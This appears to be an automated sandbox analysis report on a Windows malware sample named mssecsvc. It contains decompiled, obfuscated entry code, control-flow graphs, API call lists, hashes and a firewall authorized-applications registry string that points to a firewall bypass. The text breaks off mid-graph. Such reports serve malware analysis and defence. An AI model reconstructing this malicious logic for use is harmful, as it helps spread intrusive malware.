                                                                                control_flow_graph 181 409a16-409a8b __set_app_type __p__fmode __p__commode call 409ba1 184 409a99-409af0 call 409b8c _initterm __getmainargs _initterm 181->184 185 409a8d-409a98 __setusermatherr 181->185 188 409af2-409afa 184->188 189 409b2c-409b2f 184->189 185->184 192 409b00-409b03 188->192 193 409afc-409afe 188->193 190 409b31-409b35 189->190 191 409b09-409b0d 189->191 190->189 194 409b13-409ecb 191->194 195 409b0f-409b11 191->195 192->191 196 409b05-409b06 192->196 193->188 193->192 195->194 195->196 196->191
                                                                                C-Code - Quality: 73%
                                                                                			_entry_(void* __ebx, void* __edx) {
				intOrPtr _v8;
				intOrPtr _v28;
				intOrPtr _v52;
				intOrPtr _v84;
				char _v96;
				int _v100;
				char** _v104;
				intOrPtr _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				void* _v136;
				short _v152;
				char _v184;
				void* _v1114639227;
				void* __esi;
				void* _t50;
				intOrPtr _t59;
				signed char _t74;
				void* _t83;
				int _t86;
				void* _t88;
				intOrPtr _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				void* _t95;
				void* _t101;
				void* _t102;
				signed int _t104;
				void* _t108;
				signed char _t111;
				signed int _t125;
				void* _t133;
				intOrPtr* _t136;
				intOrPtr _t141;
				intOrPtr _t142;
				intOrPtr* _t143;
				void* _t146;
				intOrPtr _t148;
				void* _t159;
				void* _t160;
				void* _t163;

				_t108 = __edx;
				_push(0xffffffff);
				_push(0x40a1a0);
				_push(0x409ba2);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t141;
				_t142 = _t141 - 0x68;
				_push(__ebx);
				_push(_t133);
				_v28 = _t142;
				_v8 = 0;
				__set_app_type(2);
				 *0x70f894 =  *0x70f894 | 0xffffffff;
				 *0x70f898 =  *0x70f898 | 0xffffffff;
				 *(__p__fmode()) =  *0x70f88c;
				 *(__p__commode()) =  *0x70f888;
				 *0x70f890 = _adjust_fdiv;
				_t50 = E00409BA1( *_adjust_fdiv);
				_t148 =  *0x431410; // 0x1
				if(_t148 == 0) {
					__setusermatherr(E00409B9E);
				}
				E00409B8C(_t50);
				_push(0x40b010);
				_push(0x40b00c);
				L00409B86();
				_v112 =  *0x70f884;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
				_push(0x40b008);
				_push(0x40b000); // executed
				L00409B86(); // executed
				_t143 = _t142 + 0x24;
				_t136 =  *_acmdln;
				_v120 = _t136;
				if( *_t136 != 0x22) {
					while( *_t136 > 0x20) {
						_t136 = _t136 + 1;
						_v120 = _t136;
					}
				} else {
					do {
						_t136 = _t136 + 1;
						_v120 = _t136;
						_t92 =  *_t136;
					} while (_t92 != 0 && _t92 != 0x22);
					if( *_t136 == 0x22) {
						L6:
						_t136 = _t136 + 1;
						_v120 = _t136;
					}
				}
				_t59 =  *_t136;
				if(_t59 != 0 && _t59 <= 0x20) {
					goto L6;
				}
				_v52 = 0;
				_push( &_v96);
				asm("sbb dh, bh");
				asm("adc dh, 0x43");
				asm("clc");
				_t101 = 0x6b40;
				_t111 =  !(_t108 + 1 - 1);
				do {
					asm("adc word [ecx+0xa6b000], 0x592d");
					asm("lahf");
					_t74 = 0xbadbb2 &  !(_t101 + 1);
					_t159 = _t74 - _t101;
					asm("sbb edx, 0x10");
					_t101 = _t101 - 2;
					_t111 = _t74;
				} while (_t159 >= 0);
				_t83 = _t133 - 7;
				_t125 = _t111 - 1;
				_t160 =  *_t143 - 0xfffffffe;
				do {
				} while (_t160 > 0);
				asm("pushad");
				_t146 =  &_v184 - 0xffffffdc;
				L00A71825();
				goto L27;
				do {
					do {
						do {
							L27:
							_t95 = 0xffffffffffffffff;
							do {
								_t95 = _t95 - 1;
							} while (_t95 != 0);
							_t83 = _t83 + 1;
							_t125 = _t101 + _t125;
							_t102 =  *((intOrPtr*)(_t95 + 0x3c));
							_t101 = _t102 - 0x7ffffffd;
							_t163 = _t101;
						} while (_t163 >= 0);
						asm("sbb ecx, 0x13e6");
						_t125 =  !_t125;
					} while (_t163 >= 0);
					_push( *((intOrPtr*)(_t101 + _t95 - 0x7fffec1c)));
					_t83 = _t83 + 1;
					_t146 = _t146 + 4;
					_t37 =  &_v152;
					 *_t37 = _v152 + 0xbab0;
				} while ( *_t37 != 0);
				_push(0xaba79f19);
				L00A718FA(_t83, _t95, _t136);
				_v84 = _t136;
				asm("sbb edx, 0x49174bd6");
				_t104 =  !(_t101 - 0xed);
				_t86 = L00A71A00(_t95, _t104, _t125, _t136);
				_v100 = _t86;
				if(_t86 - 4 >= 0) {
					_t89 =  *[fs:0x18];
					_t125 = _t125 & 0xffffff00 | _t165;
					if(_t89 < 0) {
						_push(0xa93b14fc);
						_t133 = _t133 + 1;
						_t90 = L00A718FA(_t89, _t95, _t136);
						L00A718F2();
						goto L20;
					} else {
						_t90 =  *((intOrPtr*)(_t89 + 0x34));
						_t125 = _t125 + 1;
						L20:
						if(_t90 == _t95) {
							_t104 = _t104 - 1;
							L00A718BD();
							_t125 = 0x534aa1dd;
						}
						_push(0xd5459ff8);
						L00A718FA(_t90, _t95, _t136);
						_push(_v108);
						L00A718F2();
					}
				}
				 *0x409b1a = 0xa0a815ff;
				 *0x409b1e = 0x40;
				_pop(_t88);
				return _t88;
			}













































                                                                                0x00409a16
                                                                                0x00409a19
                                                                                0x00409a1b
                                                                                0x00409a20
                                                                                0x00409a2b
                                                                                0x00409a2c
                                                                                0x00409a33
                                                                                0x00409a36
                                                                                0x00409a38
                                                                                0x00409a39
                                                                                0x00409a3e
                                                                                0x00409a43
                                                                                0x00409a4a
                                                                                0x00409a51
                                                                                0x00409a64
                                                                                0x00409a72
                                                                                0x00409a7b
                                                                                0x00409a80
                                                                                0x00409a85
                                                                                0x00409a8b
                                                                                0x00409a92
                                                                                0x00409a98
                                                                                0x00409a99
                                                                                0x00409a9e
                                                                                0x00409aa3
                                                                                0x00409aa8
                                                                                0x00409ab2
                                                                                0x00409acb
                                                                                0x00409ad1
                                                                                0x00409ad6
                                                                                0x00409adb
                                                                                0x00409ae0
                                                                                0x00409ae8
                                                                                0x00409aea
                                                                                0x00409af0
                                                                                0x00409b2c
                                                                                0x00409b31
                                                                                0x00409b32
                                                                                0x00409b32
                                                                                0x00409af2
                                                                                0x00409af2
                                                                                0x00409af2
                                                                                0x00409af3
                                                                                0x00409af6
                                                                                0x00409af8
                                                                                0x00409b03
                                                                                0x00409b05
                                                                                0x00409b05
                                                                                0x00409b06
                                                                                0x00409b06
                                                                                0x00409b03
                                                                                0x00409b09
                                                                                0x00409b0d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409b13
                                                                                0x00409b19
                                                                                0x00409eb8
                                                                                0x00409ec1
                                                                                0x00409ec9
                                                                                0x00409eca
                                                                                0x00409ecb
                                                                                0x00409c1c
                                                                                0x00409c2a
                                                                                0x00409d16
                                                                                0x00409d1d
                                                                                0x00409d1f
                                                                                0x00409dc1
                                                                                0x00409dc4
                                                                                0x00409dca
                                                                                0x00409bca
                                                                                0x00409bcc
                                                                                0x00409bcf
                                                                                0x00a7182f
                                                                                0x00a71835
                                                                                0x00a71835
                                                                                0x00a7183b
                                                                                0x00a7183d
                                                                                0x00a71840
                                                                                0x00a71840
                                                                                0x00a71845
                                                                                0x00a71845
                                                                                0x00a71845
                                                                                0x00a71845
                                                                                0x00a71845
                                                                                0x00a71846
                                                                                0x00a71846
                                                                                0x00a71846
                                                                                0x00a7184a
                                                                                0x00a7184b
                                                                                0x00a71ac7
                                                                                0x00a71ac8
                                                                                0x00a71ac8
                                                                                0x00a71ac8
                                                                                0x00a71ad4
                                                                                0x00a71add
                                                                                0x00a71add
                                                                                0x00a71ae5
                                                                                0x00a71aec
                                                                                0x00a71aed
                                                                                0x00a71af0
                                                                                0x00a71af0
                                                                                0x00a71af0
                                                                                0x00a71afd
                                                                                0x00a71b05
                                                                                0x00a71b0c
                                                                                0x00a71b10
                                                                                0x00a71b16
                                                                                0x00a71b18
                                                                                0x00a71b1d
                                                                                0x00a71b24
                                                                                0x00a71b2a
                                                                                0x00a71b30
                                                                                0x00a71b35
                                                                                0x00a71784
                                                                                0x00a71789
                                                                                0x00a7178a
                                                                                0x00a7178f
                                                                                0x00000000
                                                                                0x00a71b3b
                                                                                0x00a71b3b
                                                                                0x00a7177e
                                                                                0x00a71795
                                                                                0x00a71797
                                                                                0x00a7179c
                                                                                0x00a7179d
                                                                                0x00a717a2
                                                                                0x00a717a2
                                                                                0x00a717a7
                                                                                0x00a717ac
                                                                                0x00a717b3
                                                                                0x00a717b7
                                                                                0x00a717b7
                                                                                0x00a71b35
                                                                                0x00a717bc
                                                                                0x00a717c9
                                                                                0x00a717e4
                                                                                0x00a717e5

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.384287103.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000B.00000002.384275377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.384356505.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.384367996.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.384391046.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.384541259.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.384640585.0000000000710000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.388561725.0000000000A6B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_400000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _initterm$__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                • String ID:
                                                                                • API String ID: 1833031408-0
                                                                                • Opcode ID: a41b4657ff2deeee174bcbbbd79ecb1497c639d275d4a9d0d1393ceb5d6b9313
                                                                                • Instruction ID: 0d0aeb106c39f1347577fd97bc1a6ee6419126cbec86dc1411ea7cfa02004f33
                                                                                • Opcode Fuzzy Hash: a41b4657ff2deeee174bcbbbd79ecb1497c639d275d4a9d0d1393ceb5d6b9313
                                                                                • Instruction Fuzzy Hash: AB318271844348EFD720DFA4EC45A9A7BB4FB09720F20423BE591A72D2D7786C41CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 00A83C3D Relevance: 33.7, APIs: 17, Strings: 2, Instructions: 487libraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 228 a83c3d-a83c59 229 a83ca9-a83cb3 call a8252f 228->229 230 a83c5b-a83c63 228->230 238 a83cfb-a83d43 GetSystemDirectoryA call a83d1f 229->238 239 a83cb5-a83cce call a83cc2 229->239 231 a83c64-a83c67 230->231 233 a83c69-a83c6e 231->233 234 a83c93 231->234 233->234 236 a83c70-a83c91 233->236 234->231 237 a83c95-a83d43 GetWindowsDirectoryA call a83d36 234->237 236->234 246 a83d45-a83dc0 GetProcAddress LoadLibraryA call a810ce call a801cb GetTickCount call a83b76 237->246 238->246 248 a83cd4-a83cdc GetProcAddress 239->248 249 a83ccf call a826d4 239->249 260 a83dc8-a83dcd call a83b76 246->260 261 a83dc2 246->261 251 a83cde 248->251 252 a83ce0-a83d43 call a83cf0 248->252 249->248 251->252 252->246 264 a83dcf-a83de6 260->264 261->260 265 a83de8-a83df8 call a863a0 call a8273c 264->265 270 a83dfa-a83dfc 265->270 271 a83dfe-a83e1a call a863a0 265->271 273 a83e1b-a83e1c 270->273 271->273 273->265 275 a83e1e-a83e24 273->275 275->264 276 a83e26-a83e30 call a8273c 275->276 279 a83e3f-a83e78 call a8273c GetVolumeInformationA 276->279 280 a83e32-a83e3a call a82750 276->280 284 a83e7a-a83e80 279->284 285 a83e82-a83e88 279->285 280->279 287 a83e91-a83e9e 284->287 286 a83e8a 285->286 285->287 286->287 288 a83ea4-a83ec3 call a83eb5 287->288 289 a83f25 287->289 296 a83f1c-a83f1e 288->296 297 a83ec6-a83ec8 288->297 291 a83f2f 289->291 293 a83f4f-a83fd1 call a83f60 call a810ce call a83f8f 291->293 294 a83f31-a83f49 CreateThread CloseHandle 291->294 309 a83ffa-a8400b CreateEventA 293->309 310 a83fd3-a83ff8 CreateThread CloseHandle 293->310 294->293 296->289 300 a83f20 call a83405 296->300 297->291 299 a83eca-a83f14 GetModuleFileNameA 297->299 299->296 300->289 311 a84012-a8402a call a837fa 309->311 310->309 314 a8402c-a8402f 311->314 315 a84031-a84044 call a83b90 311->315 314->315 316 a8404c-a84054 314->316 321 a8404a 315->321 322 a842be-a842c5 315->322 318 a84065-a8406e 316->318 319 a84056-a84063 lstrlen 316->319 329 a84074-a8407b 318->329 330 a84315-a8431b 318->330 319->318 319->319 323 a84081-a840a0 321->323 325 a84320-a84322 RtlExitUserThread 322->325 326 a842c7-a842ce 322->326 323->322 334 a840a6-a840b9 323->334 327 a842d0-a842dc SetEvent 326->327 328 a842e2-a842e9 326->328 327->328 331 a842eb 328->331 332 a842f2-a84310 Sleep ResetEvent 328->332 329->323 330->311 331->332 332->311 336 a840bf-a8416e call a8273c call a82750 GetVersionExA call a82750 call a83358 call a84178 334->336 337 a842b7 334->337 348 a84170 336->348 349 a84195-a841a5 call a83358 336->349 337->322 350 a84192-a84194 348->350 351 a84172-a8418c 348->351 355 a841c3-a841ca 349->355 356 a841a7-a841bd CreateThread CloseHandle 349->356 350->349 351->350 357 a8418e 351->357 358 a841d0-a841eb 355->358 356->355 357->350 360 a841ed-a841f4 358->360 361 a84210-a84214 358->361 360->361 362 a841f6-a84207 GetTickCount 360->362 361->337 363 a8421a-a8421c 361->363 362->361 364 a84209 362->364 365 a8421e-a84236 363->365 364->361 366 a84238 365->366 367 a8423b-a84243 365->367 366->367 367->365 368 a84245 367->368 369 a8424b-a8424f 368->369 370 a84261-a84263 369->370 371 a84251-a84258 call a82f08 369->371 372 a84265-a8426f 370->372 371->337 377 a8425a 371->377 374 a84274-a84282 call a86541 call a8655b 372->374 374->358 382 a84288-a84292 Sleep 374->382 377->372 379 a8425c-a8425f 377->379 379->369 382->374 383 a84294-a842a5 GetTickCount 382->383 383->358 384 a842ab-a842b2 383->384 384->337 384->358
                                                                                APIs
                                                                                • GetWindowsDirectoryA.KERNEL32(00A86AA2,00000104), ref: 00A83CA1
                                                                                • GetProcAddress.KERNEL32(00000000,00000002), ref: 00A83CD4
                                                                                • GetProcAddress.KERNEL32(00000000,00A83D41), ref: 00A83D4C
                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00A83D5F
                                                                                • GetTickCount.KERNEL32 ref: 00A83D93
                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00A86EF6,00000000,00000000,00000000,00000000), ref: 00A83E65
                                                                                • GetModuleFileNameA.KERNEL32(00000000,00A86AA2,000000C8), ref: 00A83EE2
                                                                                Strings
                                                                                • ADVAPI32.DLL, xrefs: 00A83D5E
                                                                                • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00A83F0C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$CountDirectoryFileInformationLibraryLoadModuleNameTickVolumeWindows
                                                                                • String ID: ADVAPI32.DLL$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 1749273276-2287716718
                                                                                • Opcode ID: f516923bb6111dac5ea2ce27cbf4c730b644d8035d3db586d383e9b78a19a3eb
                                                                                • Instruction ID: d4ad1339ed3aaef6d319e752c9ec55e0d589f91a092300dca8139a011d667063
                                                                                • Opcode Fuzzy Hash: f516923bb6111dac5ea2ce27cbf4c730b644d8035d3db586d383e9b78a19a3eb
                                                                                • Instruction Fuzzy Hash: AE02F172408259BFEF21AF24CC4ABEA7BACEF41710F044519ED499E082D7F45F4687A6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A83CC2 Relevance: 31.9, APIs: 16, Strings: 2, Instructions: 432libraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 385 a83cc2-a83cca GetModuleHandleA 386 a83ccc-a83cdc call a826d4 GetProcAddress 385->386 387 a83ce0-a83dc0 call a83cf0 GetProcAddress LoadLibraryA call a810ce call a801cb GetTickCount call a83b76 385->387 386->387 392 a83cde 386->392 400 a83dc8-a83dcd call a83b76 387->400 401 a83dc2 387->401 392->387 404 a83dcf-a83de6 400->404 401->400 405 a83de8-a83df8 call a863a0 call a8273c 404->405 410 a83dfa-a83dfc 405->410 411 a83dfe-a83e1a call a863a0 405->411 413 a83e1b-a83e1c 410->413 411->413 413->405 415 a83e1e-a83e24 413->415 415->404 416 a83e26-a83e30 call a8273c 415->416 419 a83e3f-a83e78 call a8273c GetVolumeInformationA 416->419 420 a83e32-a83e3a call a82750 416->420 424 a83e7a-a83e80 419->424 425 a83e82-a83e88 419->425 420->419 427 a83e91-a83e9e 424->427 426 a83e8a 425->426 425->427 426->427 428 a83ea4-a83ec3 call a83eb5 427->428 429 a83f25 427->429 436 a83f1c-a83f1e 428->436 437 a83ec6-a83ec8 428->437 431 a83f2f 429->431 433 a83f4f-a83fd1 call a83f60 call a810ce call a83f8f 431->433 434 a83f31-a83f49 CreateThread CloseHandle 431->434 449 a83ffa-a8400b CreateEventA 433->449 450 a83fd3-a83ff8 CreateThread CloseHandle 433->450 434->433 436->429 440 a83f20 call a83405 436->440 437->431 439 a83eca-a83f14 GetModuleFileNameA 437->439 439->436 440->429 451 a84012-a8402a call a837fa 449->451 450->449 454 a8402c-a8402f 451->454 455 a84031-a84044 call a83b90 451->455 454->455 456 a8404c-a84054 454->456 461 a8404a 455->461 462 a842be-a842c5 455->462 458 a84065-a8406e 456->458 459 a84056-a84063 lstrlen 456->459 469 a84074-a8407b 458->469 470 a84315-a8431b 458->470 459->458 459->459 463 a84081-a840a0 461->463 465 a84320-a84322 RtlExitUserThread 462->465 466 a842c7-a842ce 462->466 463->462 474 a840a6-a840b9 463->474 467 a842d0-a842dc SetEvent 466->467 468 a842e2-a842e9 466->468 467->468 471 a842eb 468->471 472 a842f2-a84310 Sleep ResetEvent 468->472 469->463 470->451 471->472 472->451 476 a840bf-a8416e call a8273c call a82750 GetVersionExA call a82750 call a83358 call a84178 474->476 477 a842b7 474->477 488 a84170 476->488 489 a84195-a841a5 call a83358 476->489 477->462 490 a84192-a84194 488->490 491 a84172-a8418c 488->491 495 a841c3-a841ca 489->495 496 a841a7-a841bd CreateThread CloseHandle 489->496 490->489 491->490 497 a8418e 491->497 498 a841d0-a841eb 495->498 496->495 497->490 500 a841ed-a841f4 498->500 501 a84210-a84214 498->501 500->501 502 a841f6-a84207 GetTickCount 500->502 501->477 503 a8421a-a8421c 501->503 502->501 504 a84209 502->504 505 a8421e-a84236 503->505 504->501 506 a84238 505->506 507 a8423b-a84243 505->507 506->507 507->505 508 a84245 507->508 509 a8424b-a8424f 508->509 510 a84261-a84263 509->510 511 a84251-a84258 call a82f08 509->511 512 a84265-a8426f 510->512 511->477 517 a8425a 511->517 514 a84274-a84282 call a86541 call a8655b 512->514 514->498 522 a84288-a84292 Sleep 514->522 517->512 519 a8425c-a8425f 517->519 519->509 522->514 523 a84294-a842a5 GetTickCount 522->523 523->498 524 a842ab-a842b2 523->524 524->477 524->498
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00A83CBA), ref: 00A83CC2
                                                                                • GetProcAddress.KERNEL32(00000000,00000002), ref: 00A83CD4
                                                                                • GetProcAddress.KERNEL32(00000000,00A83D41), ref: 00A83D4C
                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00A83D5F
                                                                                • GetTickCount.KERNEL32 ref: 00A83D93
                                                                                Strings
                                                                                • ADVAPI32.DLL, xrefs: 00A83D5E
                                                                                • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00A83F0C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$CountHandleLibraryLoadModuleTick
                                                                                • String ID: ADVAPI32.DLL$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 2837544101-2287716718
                                                                                • Opcode ID: 5b48797bfded511fe3541d43c5fd4cc9561b065424dfc698fabc9acd851576a7
                                                                                • Instruction ID: 5cac90c6037dd1217abd9ca1070a8794bf248bbf523859ba1c8144221eb8000e
                                                                                • Opcode Fuzzy Hash: 5b48797bfded511fe3541d43c5fd4cc9561b065424dfc698fabc9acd851576a7
                                                                                • Instruction Fuzzy Hash: 1DE10F72508259BFEF25AF24CC0ABEA7BACEF41700F004519ED499E082E6F45F4587A2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A83CF0 Relevance: 31.9, APIs: 16, Strings: 2, Instructions: 409COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 525 a83cf0-a83dc0 GetModuleHandleA call a826d4 GetSystemDirectoryA call a83d1f GetProcAddress LoadLibraryA call a810ce call a801cb GetTickCount call a83b76 537 a83dc8-a83dcd call a83b76 525->537 538 a83dc2 525->538 541 a83dcf-a83de6 537->541 538->537 542 a83de8-a83df8 call a863a0 call a8273c 541->542 547 a83dfa-a83dfc 542->547 548 a83dfe-a83e1a call a863a0 542->548 550 a83e1b-a83e1c 547->550 548->550 550->542 552 a83e1e-a83e24 550->552 552->541 553 a83e26-a83e30 call a8273c 552->553 556 a83e3f-a83e78 call a8273c GetVolumeInformationA 553->556 557 a83e32-a83e3a call a82750 553->557 561 a83e7a-a83e80 556->561 562 a83e82-a83e88 556->562 557->556 564 a83e91-a83e9e 561->564 563 a83e8a 562->563 562->564 563->564 565 a83ea4-a83ec3 call a83eb5 564->565 566 a83f25 564->566 573 a83f1c-a83f1e 565->573 574 a83ec6-a83ec8 565->574 568 a83f2f 566->568 570 a83f4f-a83fd1 call a83f60 call a810ce call a83f8f 568->570 571 a83f31-a83f49 CreateThread CloseHandle 568->571 586 a83ffa-a8400b CreateEventA 570->586 587 a83fd3-a83ff8 CreateThread CloseHandle 570->587 571->570 573->566 577 a83f20 call a83405 573->577 574->568 576 a83eca-a83f14 GetModuleFileNameA 574->576 576->573 577->566 588 a84012-a8402a call a837fa 586->588 587->586 591 a8402c-a8402f 588->591 592 a84031-a84044 call a83b90 588->592 591->592 593 a8404c-a84054 591->593 598 a8404a 592->598 599 a842be-a842c5 592->599 595 a84065-a8406e 593->595 596 a84056-a84063 lstrlen 593->596 606 a84074-a8407b 595->606 607 a84315-a8431b 595->607 596->595 596->596 600 a84081-a840a0 598->600 602 a84320-a84322 RtlExitUserThread 599->602 603 a842c7-a842ce 599->603 600->599 611 a840a6-a840b9 600->611 604 a842d0-a842dc SetEvent 603->604 605 a842e2-a842e9 603->605 604->605 608 a842eb 605->608 609 a842f2-a84310 Sleep ResetEvent 605->609 606->600 607->588 608->609 609->588 613 a840bf-a8416e call a8273c call a82750 GetVersionExA call a82750 call a83358 call a84178 611->613 614 a842b7 611->614 625 a84170 613->625 626 a84195-a841a5 call a83358 613->626 614->599 627 a84192-a84194 625->627 628 a84172-a8418c 625->628 632 a841c3-a841ca 626->632 633 a841a7-a841bd CreateThread CloseHandle 626->633 627->626 628->627 634 a8418e 628->634 635 a841d0-a841eb 632->635 633->632 634->627 637 a841ed-a841f4 635->637 638 a84210-a84214 635->638 637->638 639 a841f6-a84207 GetTickCount 637->639 638->614 640 a8421a-a8421c 638->640 639->638 641 a84209 639->641 642 a8421e-a84236 640->642 641->638 643 a84238 642->643 644 a8423b-a84243 642->644 643->644 644->642 645 a84245 644->645 646 a8424b-a8424f 645->646 647 a84261-a84263 646->647 648 a84251-a84258 call a82f08 646->648 649 a84265-a8426f 647->649 648->614 654 a8425a 648->654 651 a84274-a84282 call a86541 call a8655b 649->651 651->635 659 a84288-a84292 Sleep 651->659 654->649 656 a8425c-a8425f 654->656 656->646 659->651 660 a84294-a842a5 GetTickCount 659->660 660->635 661 a842ab-a842b2 660->661 661->614 661->635
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00A83CE5), ref: 00A83CF0
                                                                                • GetSystemDirectoryA.KERNEL32(00A86AA2,00000104), ref: 00A83D07
                                                                                  • Part of subcall function 00A83D1F: lstrcat.KERNEL32(00A86AA2,00A83D12), ref: 00A83D20
                                                                                  • Part of subcall function 00A83D1F: GetProcAddress.KERNEL32(00000000,00A83D41), ref: 00A83D4C
                                                                                  • Part of subcall function 00A83D1F: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00A83D5F
                                                                                  • Part of subcall function 00A83D1F: GetTickCount.KERNEL32 ref: 00A83D93
                                                                                  • Part of subcall function 00A83D1F: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00A86EF6,00000000,00000000,00000000,00000000), ref: 00A83E65
                                                                                Strings
                                                                                • ADVAPI32.DLL, xrefs: 00A83D5E
                                                                                • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00A83F0C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressCountDirectoryHandleInformationLibraryLoadModuleProcSystemTickVolumelstrcat
                                                                                • String ID: ADVAPI32.DLL$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 215653160-2287716718
                                                                                • Opcode ID: 260c0d83971146764b612a54da98fff840ddc31a6bb3a69eed28180f54add843
                                                                                • Instruction ID: 4ab443a3eb1eb06846e5f70b8bd5bdf92c9ff43e481e4fb1ca27562f6dc35dfb
                                                                                • Opcode Fuzzy Hash: 260c0d83971146764b612a54da98fff840ddc31a6bb3a69eed28180f54add843
                                                                                • Instruction Fuzzy Hash: 54E1FF72508249BFEF25AF24CC0EBEA7BACEF41700F004659ED499E082D6F45F4587A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A83D1F Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 389stringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 662 a83d1f-a83dc0 lstrcat call a83d36 GetProcAddress LoadLibraryA call a810ce call a801cb GetTickCount call a83b76 673 a83dc8-a83dcd call a83b76 662->673 674 a83dc2 662->674 677 a83dcf-a83de6 673->677 674->673 678 a83de8-a83df8 call a863a0 call a8273c 677->678 683 a83dfa-a83dfc 678->683 684 a83dfe-a83e1a call a863a0 678->684 686 a83e1b-a83e1c 683->686 684->686 686->678 688 a83e1e-a83e24 686->688 688->677 689 a83e26-a83e30 call a8273c 688->689 692 a83e3f-a83e78 call a8273c GetVolumeInformationA 689->692 693 a83e32-a83e3a call a82750 689->693 697 a83e7a-a83e80 692->697 698 a83e82-a83e88 692->698 693->692 700 a83e91-a83e9e 697->700 699 a83e8a 698->699 698->700 699->700 701 a83ea4-a83ec3 call a83eb5 700->701 702 a83f25 700->702 709 a83f1c-a83f1e 701->709 710 a83ec6-a83ec8 701->710 704 a83f2f 702->704 706 a83f4f-a83fd1 call a83f60 call a810ce call a83f8f 704->706 707 a83f31-a83f49 CreateThread CloseHandle 704->707 722 a83ffa-a8400b CreateEventA 706->722 723 a83fd3-a83ff8 CreateThread CloseHandle 706->723 707->706 709->702 713 a83f20 call a83405 709->713 710->704 712 a83eca-a83f14 GetModuleFileNameA 710->712 712->709 713->702 724 a84012-a8402a call a837fa 722->724 723->722 727 a8402c-a8402f 724->727 728 a84031-a84044 call a83b90 724->728 727->728 729 a8404c-a84054 727->729 734 a8404a 728->734 735 a842be-a842c5 728->735 731 a84065-a8406e 729->731 732 a84056-a84063 lstrlen 729->732 742 a84074-a8407b 731->742 743 a84315-a8431b 731->743 732->731 732->732 736 a84081-a840a0 734->736 738 a84320-a84322 RtlExitUserThread 735->738 739 a842c7-a842ce 735->739 736->735 747 a840a6-a840b9 736->747 740 a842d0-a842dc SetEvent 739->740 741 a842e2-a842e9 739->741 740->741 744 a842eb 741->744 745 a842f2-a84310 Sleep ResetEvent 741->745 742->736 743->724 744->745 745->724 749 a840bf-a8416e call a8273c call a82750 GetVersionExA call a82750 call a83358 call a84178 747->749 750 a842b7 747->750 761 